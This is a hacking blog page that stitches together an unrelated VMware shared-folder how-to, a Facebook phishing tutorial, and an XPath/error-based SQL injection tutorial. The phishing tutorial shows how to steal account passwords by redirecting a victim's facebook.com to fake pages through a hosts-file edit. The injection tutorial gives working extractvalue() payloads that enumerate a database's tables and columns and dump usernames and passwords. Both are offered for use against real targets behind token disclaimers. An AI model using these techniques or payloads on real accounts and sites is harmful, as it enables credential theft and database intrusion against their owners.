After you’ve had a fully working Lion you can enable the VMware share folder to your Windows 7 host machine. So this way the VM will have access to your Windows 7 file.

To do this, go to the “Virtual Machine Settings” when it was powered off.

Go under options tab, select “Shared Folders”

Pick “Always enable” and click “OK”

Go “Browse..” the folder that you wish to share to.

From here you can pick and choose to make the folder to be “Read-only” or “Enable this share”

That’s all there is. Finish the wizard and power on the VM again you should now see the mount folder on your Lion desktop that points to your Windows 7 shared folder.

Facebook hacked

Facebook is becoming secured day by day, it daily fixes several bugs found by users. Recently we have noticed that it has also tried to fix the Phishing loophole by validating the previous URL from which the user is arriving to Facebook. It validates from which source user is arriving on Facebook and hence if its a fake Facebook Page, it warns its users that Please Change your Password Immediately as you might be a victim of Phishing. This validation made Facebook account passwords secured from thousands of Novice and Script Kiddie Hackers but L33T  still can’t be stopped, as L33Ts never stop, they keep on moving to new alternatives.

So we moved to advanced mode of Phishing like Tabnabbing, meta refresh trick, browser side bypassing and even manipulating host(hint is sufficient as i will not disclose this one)..when i feel bored i use this technique to hack accounts and passwords of Facebook. Just try to figure out what we can do using Host File 😛 ..Not going to tell more than that…

Ok…. Ok… Lets learn today the technique called Host Name IP mapped based Phishing. You all will be really happy to know that i have written my third white paper on the same topic and you will be more than happy by knowing that this technique of Phishing is invented by Lokesh Singh (:P none other than me…).. So friends lets start our tutorial.

How to hack Facebook account and passwords

Note: This is for Educational Purposes only. Don’t misuse it.:P Please…

Requirements:

1. Facebook latest Phisher or Fake Pages.

Download Latest Facebook Phisher here: Download Now

2. Free Web hosting server to upload those Phish Pages.

3. Spoofing URL using Host name mapping technique.

Let me provide you little background what i will teach you today. I know most of you already know phishing but for first timers, let me explain a bit. Phish Pages means Fake Pages that looks absolutely similar to original pages and the technique of using those Fake pages to hack anyone’s user name and password is called Phishing. And technique which we use to send these fake pages to victim and prompt him to believe that they are real is called Social Engineering. But i think this we already know, what’s new we are going to discuss today.. Ahhh… Just wait and hold your pants tight because today i will be breaking all the policies and ethical norms because until and unless we don’t know how hackers do things we will never able to stand in front of them.

What is New???

We all know that fake pages can only be detected using two techniques:

1. Verifying the URL in the address bar, if its a fake page then URL must be different from original one.

2. Using any web security toolbar that warns users for fake pages like AVG toolbar, Norton Online security toolbar etc..

But what if you open http://www.facebook.com manually in your web browser and fake page opens and URL in the web browser remains http://www.facebook.com only. That means first technique to detect fake page go in vain. Now for second technique, all online web security toolbar detect fake pages by comparing the input  by user in URL address bar and original page URL. If both matches then its not a fake page else its a malware page.

So friends today i will teach you how to make your fake pages open whenever victim opens Facebook in his/her web browser. Ahhh… You will be now thinking its impossible. But as i have told you i have written a white paper on Advanced Phishing techniques. So its 110% possible to load fake web page whenever user opens http://www.facebook.com or any other website like Yahoo, Hotmail or anything… Below are the steps and video for the same.

I had made the video as well as written the steps in detail which will tell you everything step by step.

Steps to Hack Facebook account or Password:

1. Download the Latest Facebook Phisher.

2. Extract the files, you will get below 4 files:

• index.php
• facebook1.php
• passwords.html
• thanks.php

3. Now go to any free web hosting web server to upload these fake pages.

Note all should be uploaded at root means not in any folder. Just at first level directory.

4. Now you need to find the correct IP address of the account you have created on web hosting server.

5. When you get you fake page’s IP address, now what we need to do is that we have to add the entry of the IP address against the http://www.facebook.com in victim’s host file located at below location.

C:\Windows\System32\drivers\etc

6. There are several ways of doing that, i have written my own php scripts for doing the same but i cannot share that with you guys because there are chances of misusing it. So i explain you the logic and rest you need to figure out how you will edit victims host file and append your Fake Page IP address against http://www.facebook.com.

7. Now after doing steps 5 and 6, whenever user open the http://www.facebook.com, your fake Facebook page will open and victim will never be able to visit the original Facebook, so he cannot even been able to change his password…:P

8. I have added an extra logic to my scripts, whenever victim enter the password and hit enter button, i am removing the entry of Fake IP address against http://www.facebook.com from the host file by making it spaces. So it will be for him for one time only which sounds more spoofed. Its just a single line code but i cannot tell you guys because it will make this article completely unethical.

I will teach you techniques but i will not do spoon feeding because if you want to become good hacker then you need to use your brain too. I love to be called Destructive but i do constructive works..:P like this one…rofl…

9. Everything other than this is similar to normal phishing technique..

I hope you all like it… If not here is the video of the complete hack in detail with each and every step shown practically.

Note: In video i am using my localhost as web server which in your case will be uraccountname.my3gb.com or other means where you uploaded your files.

Also you must know 127.0.0.1 is localhost IP address. For you case your webhosting will be the IP address that will be used to map against facebook.

I hope you all love this tutorial 😛 you have to… Because its the best method for hacking anyone’s account..

Hack Websites Using XPath Injection

NOTE: ONLY FOR EDUCATIONAL PURPOSE. IT IS TOTALLY ILLEGAL AND YOU WILL BE PUNISHED. SO DONT TRY.

XPath Injection:

SQL is the most popular type of code injection attack, there are several others that can be just as dangerous to your applications and your data, including LDAP injection and XPath injection. An ‘XPath injection’ attack is similar to an SQL injection attack, but its target is an XML document rather than an SQL database. ‘XPath Injection’ is an attack technique used to exploit web sites that construct XPath queries from user-supplied input.

What is XML?

XML stands for Extensible Markup Language and was designed to describe data. It allows programmers to create their own customized tags to store data. In XML the data is stored in nodes in a tree form. XML Path or XPath language is used for querying information from the nodes of an XML document. Please refer to XML Tutorial for more details on XML.

What is XPath?

“XML Path” or “XPath” 1.0 is a language used to refer to parts of an XML document. Path expressions are used to access elements and attributes in an XML document, which return a node-set, a string, a Boolean or a number. It can be used directly to query an XML document by an application, or as part of a larger operation such as applying an XSLT transformation to an XML document, or applying an XQuery to an XML document. Please refer to XPath Tutorial for more details on XPath.

In Detail:

Code Injection is a technique to Inject code into a program or application code by taking advantage of the unchecked assumptions the application makes about its inputs to bypass or modify the originally intended functionality of the code. All code injection attacks work in a same way; an attacker injects malicious code into the application code through an input field of the application. So, to perform such attacks there must be entry points that are not performing adequate validation.
Consider a Web application that uses XPath to query an XML document to retrieve the social security number of a customer by passing name and password values that are supplied by the user of the application. If the application embeds these values directly in the XPath query then it is vulnerable to XPath Injection.

OK, so when to use it? Let us assume we have found a vulnerable site that appears to be vulnerable from our usual quick tests, but when we try to inject using ORDER BY we get no errors generated. We double check using String injection method to make sure that it is not the problem, but still no results. Time to give up? Never, let us now try to see if we might be able to use XPATH injection.

We will start with a quick check to confirm versioning to ensure this method can be used, as it only works on MySQL version >=5.1 (best with errors present). The first check for version and user looks like this:

COMMAND: http://site.com/index.php?id=1 and extractvalue(rand(),concat(0x3a,version(),0x3a,user()))—

RESULT: ’Xpath syntax error: version info:user info’

OK, so now we have confirmation that this method will work as clearly displayed in the errors seen. We now have the version and current user info. Now we will move to checking the table info, like this:

COMMAND: http://site.com/index.php?id=1 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,table_name) from information_schema.tables limit 0,1)))–

RESULT: ’Xpath syntax error: <Table Name Found at address used in LIMIT statement>’

This is the biggest problem with XPATH Injection, it gets tricky here. You will need to use the LIMIT statement to sort your results and keep traffic of all of the table names found. This can be very time consuming, but it is key that you use your brain to pick up on any relationships that become obvious as you are sorting through tables, while also keeping an eye out for juicy tables that may warrant further investigation in future steps. I suggest first sorting them to find the lower and upper limits so you know what type of range you are working with (some sites will be only a few and others will have thousands in total – see example below).

Once you have determined the table info, you will need to follow similar steps to pull the column details. It works very similar to tables and looks like this:

COMMAND: http://site.com/index.php?id=1 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,column_name) from information_schema.columns limit 0,1)))–

RESULT: ‘Xpath syntax error: <column name found at address used in LIMIT statement>’

This is just as time consuming as the pulling the table names and is a bit tricky as it becomes very hard to tell what columns link to what tables or database for that matter, for this reason it is key to use your brain power to make some logical determinations about what you find. This means you can use your brain to deduce that you have found a table named mysql_auth_users and columns idx, username, and password. It would not be a great stretch to assume these might go together. I tend to use a bit of trial and error on this last part but have found if you just think about it for a minute you can usually make the necessary connections to extract what you want. That being said, extraction of data works the exact same as it does for simple SQLi. You choose the columns you want and indicate what table to pull from and parse the results from the error given. It looks like this:

COMMAND: http://site.com/index.php?id=1 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,idx,0x3a,username,0x3a,password) from mysql_auth_usr)))–

RESULT:  Xpath syntax error: ‘:1:admin:password1’

Now you have successfully injected and extracted the data using XPATH injection! Now go pat yourself on the back for learning a new method and enjoy a well-deserved break There are other XPATH queries that can be used but this is the one I have found the best results with. You can also use updatexml(). I will continue to add to this as I investigate this technique more, but this concludes my write up on XPATH injection using the EXTRACTVLAUE() method for now. I hope you have found this interesting and educational and as always until next time Enjoy!